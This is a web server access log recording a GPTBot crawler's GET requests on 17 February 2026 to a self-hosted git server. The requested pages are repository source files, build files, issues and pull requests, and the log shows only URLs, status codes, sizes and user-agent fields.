"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12530] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11448] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" -[17/Feb/2026:17:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:17:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11203] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11722] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" -[17/Feb/2026:17:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13738] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13425] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11412] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13193] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:17:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11382] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:17:48:25 +0000] - 200 200 